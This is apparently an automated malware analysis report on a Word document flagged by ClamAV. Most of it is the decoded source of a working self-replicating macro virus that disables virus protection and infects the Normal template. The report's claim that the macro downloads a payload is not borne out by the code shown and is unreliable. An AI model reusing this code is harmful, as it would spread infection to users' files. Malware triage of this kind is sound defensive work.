Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 26f266db02c36cf0…

MALICIOUS

Office (OLE)

Size: 49.0 KB
Created: 2000-08-21 20:20:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: ec1b3ca686597e2e2d0110cfe013b618
SHA-1: ed183b92c8940de65a827c4a7d5ecad33b06cc0f
SHA-256: 26f266db02c36cf0be703fb31dfe0641f8719cd794f70a93bd1935f982d46990
Risk Score: 180

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment

The sample contains a VBA macro that is triggered by the Document_Open event. This macro is designed to download and execute a secondary payload, as indicated by the critical ClamAV detections for 'Doc.Trojan.CPCK-2' and 'Doc.Trojan.Class-35'. The macro code is heavily obfuscated, but its intent to download and execute is clear from the heuristic firings.

Heuristics (3)

  • ClamAV: Doc.Trojan.CPCK-2 (severity: critical; rule: CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Trojan.CPCK-2
  • VBA macros detected (severity: medium; 1 related finding; rule: OLE_VBA_MACROS)
    Document contains VBA macro code
  • Document_Open macro (severity: high; rule: OLE_VBA_DOCOPEN)
    Document contains a Document_Open macro

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 15904 bytes
SHA-256: cc395cfad2e753e377f209babed0ce5bdfd73207a9ebda1aa53bbc3e557530ff
Detection: ClamAV: Doc.Trojan.Class-35
Obfuscation or payload: unlikely

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub Document_Open()
R = NgDBu + KvRBs + PwHNj + JrEIg + JyVKj + GvNVk + L
On Error Resume Next
J = NkKBh + PqHSx + ViOMq + JzFHj + UmUCl + QuMHq + VeNLw + IfDMs + N
Application.EnableCancelKey = 0
H = GgBIh + TvUUm + CxQHo + HyNHz + RpCSh + TqLFm + LnJFt + MiHMq + NyIDg + TfOBm + U
Options.VirusProtection = 0
J = PgIBl + JoDUs + UfTBu + KeQOr + H
ME84 = ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.CountOfLines
T = OhKAu + IrVJh + DpRGy + TtUJj + JjHQz + FvHUm + E
Options.SaveNormalPrompt = 0
Q = PpEFg + IpMIr + VlTFg + B
Options.ConfirmConversions = 0
H = QnUAs + NkHHe + RgQOz + V
GJ13 = NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.CountOfLines
I = EvPSf + AmFHh + RjUAk + BrVFs + UoHBg + HsEHo + BsHRf + HfIFt + RhUIy + J
If Left(ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.Lines(1, 3), 3) <> "Sub" Then
P = EwSIr + EvUUy + GzDJr + QsAJu + VfLIu + BoTVl + L
Set NQ17 = ActiveDocument.VBProject.VBComponents.Item(1)
T = JsUOj + PuAAh + EyIMm + FiKPn + BsFQq + SsEEt + A
UF19 = True
G = AxEMn + MwBGf + LgLMx + BrUFv + KoGTv + UtKAw + CfECm + CnOIw + UqBGf + T
End If
C = JeMPm + SfHUi + PgNAm + VwBJk + MxODz + QtANq + OmSCz + AlSOl + EwBRh + O
If Left(NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.Lines(1, 3), 3) <> "Sub" Then
O = DxDSt + NxASx + OoIPp + QeICn + GvMRr + BgOMx + FwKJs + TnRQm + PlQCe + H
Set NQ17 = NormalTemplate.VBProject.VBComponents.Item(1)
O = ByKPs + NlMQj + NgKPr + DrEKu + CsMTh + LyFEe + FwIEn + TnPVe + LrTSq + KxMEo + DtQTm + M
ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.InsertLines ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.CountOfLines, "' ****** " & Application.UserName & " was infected " & Now & vbCr
M = DrSIs + FuVUp + RxLTz + BvUDw + KsENh + LuBUf + EfLSm + KoDUm + CgRLs + FnVAm + KsLIl + C
ME84 = ME84 + 2
I = ImMMf + QjAIf + TiPEm + LtNLg + F
PH37 = True
Q = EwQFm + SnKUf + CpJCn + HqTJp + BgUVh + CfVQj + CnEVe + PgARp + VkFRo + ApRIf + MtTOf + E
End If
D = FhQVm + GeOOg + K
If PH37 <> True And UF19 <> True Then GoTo OU29
U = OjKOq + PgOPs + GzICr + IqARv + ChHAj + C
If PH37 = True Then NQ17.CodeModule.AddFromString ("Sub Document_Close()" & vbCr & ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.Lines(2, ME84 - 1))
E = TsMJo + PeAMh + BtLOk + KiPIr + NkFIi + RxJIp + VuPGp + N
If UF19 = True Then NQ17.CodeModule.AddFromString ("Sub Document_Open()" & vbCr & NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.Lines(2, GJ13 - 1))
N = BeCUj + LgRAn + LoSEi + D
With NQ17.CodeModule
S = VlMVi + AwIIe + LhKOp + ExRGp + ExVUm + LyTKu + FuNFz + K
For x = 2 To (NQ17.CodeModule.CountOfLines - 1) Step 2
D = HlTFz + IlLVt + OsVGx + AsGCn + HlEUr + EiLPv + VjIQs + BvCNw + JzQLz + FyVVv + AnANo + G
For y = 1 To (Int(Rnd * 10) + 2)
I = MrVEi + PeEQu + D
CI33 = CI33 + (Chr(65 + Int(Rnd * 22))) & (Chr(122 - Int(Rnd * 22))) & (Chr(65 + Int(Rnd * 22))) & (Chr(65 + Int(Rnd * 22))) & (Chr(122 - Int(Rnd * 22))) & " + "
N = AoUJu + RsOGn + JrKFe + VuQKg + PzALt + AiCRi + OxKBj + PrKSr + KfMFw + JgBNn + BhIEj + U
Next y
T = DpNRj + QgSBm + TqTRg + F
.replaceline x, (Chr(65 + Int(Rnd * 22))) & " = " & CI33 & (Chr(65 + Int(Rnd * 22)))
M = LiKHk + LnKIj + NkVHg + ToNNt + QmNEm + TnIUw + EnKNg + HfIMj + U
CI33 = ""
J = EgEOs + KoIHq + FzKKw + CjALz + CfEHn + OfQRh + BvQAn + EfJSu + G
Next x
S = TpILl + HnSIu + RiUMt + UjLDp + GhREy + OvRHz + V
End With
N = FtFHj + ViVAe + PhTGv + FyHHx + UlUVo + QjSOr + OiRBm + HpOFr + KrFEz + AoUJr + AhOVo + M
OU29:
L = TgUIu + DvMTi + BeUHl + TmEMg + NrNDj + MoDQn + SjMOs + EnOJi + IhBIl + JoJDe + VtHGk + S
If GJ13 <> 0 And ME84 = 0 Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
C = AmJKr + AzFIt + IgMMr + PeFDr + EfDPh + PqHOp + MhPRu + E
' ****** MACRO was infected 8/21/2000 1:19:59 PM
... (truncated)